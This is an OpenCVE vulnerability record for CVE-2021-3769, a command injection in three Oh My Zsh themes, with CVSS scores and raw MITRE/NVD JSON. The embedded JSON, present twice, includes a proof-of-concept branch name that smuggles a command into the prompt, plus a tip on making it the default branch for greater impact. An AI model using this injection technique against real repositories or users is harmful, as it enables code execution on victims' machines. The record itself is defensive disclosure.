CVE-2021-3769 - OpenCVE

# Vulnerability in `pygmalion`, `pygmalion-virtualenv` and `refined` themes **Description**: these themes use `print -P` on user-supplied strings to print them to the terminal. All of them do that on git information, particularly the branch name, so if the branch has a specially-crafted name the vulnerability can be exploited. **Fixed in**: [b3ba9978](https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978). **Impacted areas**: - `pygmalion` theme. - `pygmalion-virtualenv` theme. - `refined` theme.

Attack Vector Network

Attack Complexity Low

Privileges Required None

Scope Unchanged

Confidentiality Impact High

Integrity Impact High

Availability Impact High

User Interaction None

No CVSS v3.0

Access Vector Network

Access Complexity Low

Authentication None

Confidentiality Impact Complete

Integrity Impact Complete

Availability Impact Complete

AV:N/AC:L/Au:N/C:C/I:C/A:C

Vendors & Products
CPE Configurations

Vendors	Products
Planetargon	Oh My Zsh

Configuration 1 [-]

cpe:2.3:a:planetargon:oh_my_zsh:*:*:*:*:*:*:*:*

References

Link	Resource
https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978	Patch Third Party Advisory

History

No history.

MITRE Information

Status: PUBLISHED

Assigner: @huntrdev

Published: 2021-11-30T09:30:18

Updated: 2021-11-30T09:30:18

Reserved: 2021-09-05T00:00:00

Link: CVE-2021-3769

JSON object: View

NVD Information

Status : Analyzed

Published: 2021-11-30T10:15:09.000

Modified: 2021-12-01T19:56:31.297

Link: CVE-2021-3769

JSON object: View

Redhat Information

No data.

CWE

CWE-78

{"containers": {"cna": {"affected": [{"product": "ohmyzsh/ohmyzsh", "vendor": "ohmyzsh", "versions": [{"lessThan": "b3ba9978", "status": "affected", "version": "unspecified", "versionType": "custom"}]}], "descriptions": [{"lang": "en", "value": "# Vulnerability in `pygmalion`, `pygmalion-virtualenv` and `refined` themes **Description**: these themes use `print -P` on user-supplied strings to print them to the terminal. All of them do that on git information, particularly the branch name, so if the branch has a specially-crafted name the vulnerability can be exploited. **Fixed in**: [b3ba9978](https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978). **Impacted areas**: - `pygmalion` theme. - `pygmalion-virtualenv` theme. - `refined` theme."}], "exploits": [{"lang": "en", "value": "**Exploit PoC**:\n\n1. Install Oh My Zsh.\n2. Enable the `pygmalion`, `pygmalion-virtualenv` or `refined` themes.\n3. Create and `cd` into a new git repository: `git init bad-repo && cd bad-repo`.\n4. Create and switch to a new branch with a name containing either `$(<injected-command>`, <code>\\`\\<injected-command\\>\\`</code> or `${(e):-\"<injected-command>\"}`:\n\n ```sh\n badbranch='feat/bad-branch$(id>/dev/tty)'\n git checkout -b \"$badbranch\"\n ```\n\n In the `pygmalion` theme, the prompt changes changes from the default branch to:\n\n ```console\n user@host:~/exploit-poc|master \u21d2 badbranch='feat/bad-branch$(id>/dev/tty)'; git checkout -b \"$badbranch\"\n Switched to a new branch 'feat/bad-branch$(id>/dev/tty)'\n uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),...\n uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),...\n user@host:~/exploit-poc|feat/bad-branch \u21d2 \n ```\n\n A similar thing happens in `pygmalion-virtualenv` and `refined` themes.\n\nNOTE: for maximum impact, you can define the malicious branch name as the default branch name in GitHub, so that when a user clones it for the first time and enters the repository, the malicious branch is automatically checked out. That means that the user only needs to clone and enter the repository for the exploit to work.\n"}], "metrics": [{"cvssV3_1": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}}], "problemTypes": [{"descriptions": [{"cweId": "CWE-78", "description": "CWE-78 OS Command Injection", "lang": "en", "type": "CWE"}]}], "providerMetadata": {"dateUpdated": "2021-11-30T09:30:18", "orgId": "c09c270a-b464-47c1-9133-acb35b22c19a", "shortName": "@huntrdev"}, "references": [{"tags": ["x_refsource_MISC"], "url": "https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978"}], "title": "OS Command Injection in ohmyzsh/ohmyzsh", "x_legacyV4Record": {"CVE_data_meta": {"ASSIGNER": "security@huntr.dev", "ID": "CVE-2021-3769", "STATE": "PUBLIC", "TITLE": "OS Command Injection in ohmyzsh/ohmyzsh"}, "affects": {"vendor": {"vendor_data": [{"product": {"product_data": [{"product_name": "ohmyzsh/ohmyzsh", "version": {"version_data": [{"version_affected": "<", "version_value": "b3ba9978"}]}}]}, "vendor_name": "ohmyzsh"}]}}, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": {"description_data": [{"lang": "eng", "value": "# Vulnerability in `pygmalion`, `pygmalion-virtualenv` and `refined` themes **Description**: these themes use `print -P` on user-supplied strings to print them to the terminal. All of them do that on git information, particularly the branch name, so if the branch has a specially-crafted name the vulnerability can be exploited. **Fixed in**: [b3ba9978](https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978). **Impacted areas**: - `pygmalion` theme. - `pygmalion-virtualenv` theme. - `refined` theme."}]}, "exploit": [{"lang": "en", "value": "**Exploit PoC**:\n\n1. Install Oh My Zsh.\n2. Enable the `pygmalion`, `pygmalion-virtualenv` or `refined` themes.\n3. Create and `cd` into a new git repository: `git init bad-repo && cd bad-repo`.\n4. Create and switch to a new branch with a name containing either `$(<injected-command>`, <code>\\`\\<injected-command\\>\\`</code> or `${(e):-\"<injected-command>\"}`:\n\n ```sh\n badbranch='feat/bad-branch$(id>/dev/tty)'\n git checkout -b \"$badbranch\"\n ```\n\n In the `pygmalion` theme, the prompt changes changes from the default branch to:\n\n ```console\n user@host:~/exploit-poc|master \u21d2 badbranch='feat/bad-branch$(id>/dev/tty)'; git checkout -b \"$badbranch\"\n Switched to a new branch 'feat/bad-branch$(id>/dev/tty)'\n uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),...\n uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),...\n user@host:~/exploit-poc|feat/bad-branch \u21d2 \n ```\n\n A similar thing happens in `pygmalion-virtualenv` and `refined` themes.\n\nNOTE: for maximum impact, you can define the malicious branch name as the default branch name in GitHub, so that when a user clones it for the first time and enters the repository, the malicious branch is automatically checked out. That means that the user only needs to clone and enter the repository for the exploit to work.\n"}], "impact": {"cvss": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}}, "problemtype": {"problemtype_data": [{"description": [{"lang": "eng", "value": "CWE-78 OS Command Injection"}]}]}, "references": {"reference_data": [{"name": "https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978", "refsource": "MISC", "url": "https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978"}]}}}}, "cveMetadata": {"assignerOrgId": "c09c270a-b464-47c1-9133-acb35b22c19a", "assignerShortName": "@huntrdev", "cveId": "CVE-2021-3769", "datePublished": "2021-11-30T09:30:18", "dateReserved": "2021-09-05T00:00:00", "dateUpdated": "2021-11-30T09:30:18", "state": "PUBLISHED"}, "dataType": "CVE_RECORD", "dataVersion": "5.0"}

{"configurations": [{"nodes": [{"cpeMatch": [{"criteria": "cpe:2.3:a:planetargon:oh_my_zsh:*:*:*:*:*:*:*:*", "matchCriteriaId": "80FD5E81-3E73-4921-925C-E55098EAE4B1", "versionEndExcluding": "2021-11-11", "vulnerable": true}], "negate": false, "operator": "OR"}]}], "descriptions": [{"lang": "en", "value": "# Vulnerability in `pygmalion`, `pygmalion-virtualenv` and `refined` themes **Description**: these themes use `print -P` on user-supplied strings to print them to the terminal. All of them do that on git information, particularly the branch name, so if the branch has a specially-crafted name the vulnerability can be exploited. **Fixed in**: [b3ba9978](https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978). **Impacted areas**: - `pygmalion` theme. - `pygmalion-virtualenv` theme. - `refined` theme."}, {"lang": "es", "value": "# Vulnerabilidad en los temas \"pygmalion\", \"pygmalion-virtualenv\" y \"refined\" **Descripci\u00f3n**: estos temas usan \"print -P\" en las cadenas proporcionadas por el usuario para imprimirlas en la terminal. Todos ellos lo hacen sobre la informaci\u00f3n de git, particularmente el nombre de la rama, por lo que si la rama presenta un nombre especialmente dise\u00f1ado la vulnerabilidad puede ser explotada. **Corregido en**: [b3ba9978](https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978). **\u00c1reas afectadas**: - Tema \"pygmalion\". - Tema \"pygmalion-virtualenv\". - Tema \"refined\""}], "id": "CVE-2021-3769", "lastModified": "2021-12-01T19:56:31.297", "metrics": {"cvssMetricV2": [{"acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false}], "cvssMetricV31": [{"cvssData": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary"}, {"cvssData": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.6, "impactScore": 5.9, "source": "security@huntr.dev", "type": "Secondary"}]}, "published": "2021-11-30T10:15:09.000", "references": [{"source": "security@huntr.dev", "tags": ["Patch", "Third Party Advisory"], "url": "https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978"}], "sourceIdentifier": "security@huntr.dev", "vulnStatus": "Analyzed", "weaknesses": [{"description": [{"lang": "en", "value": "CWE-78"}], "source": "security@huntr.dev", "type": "Primary"}]}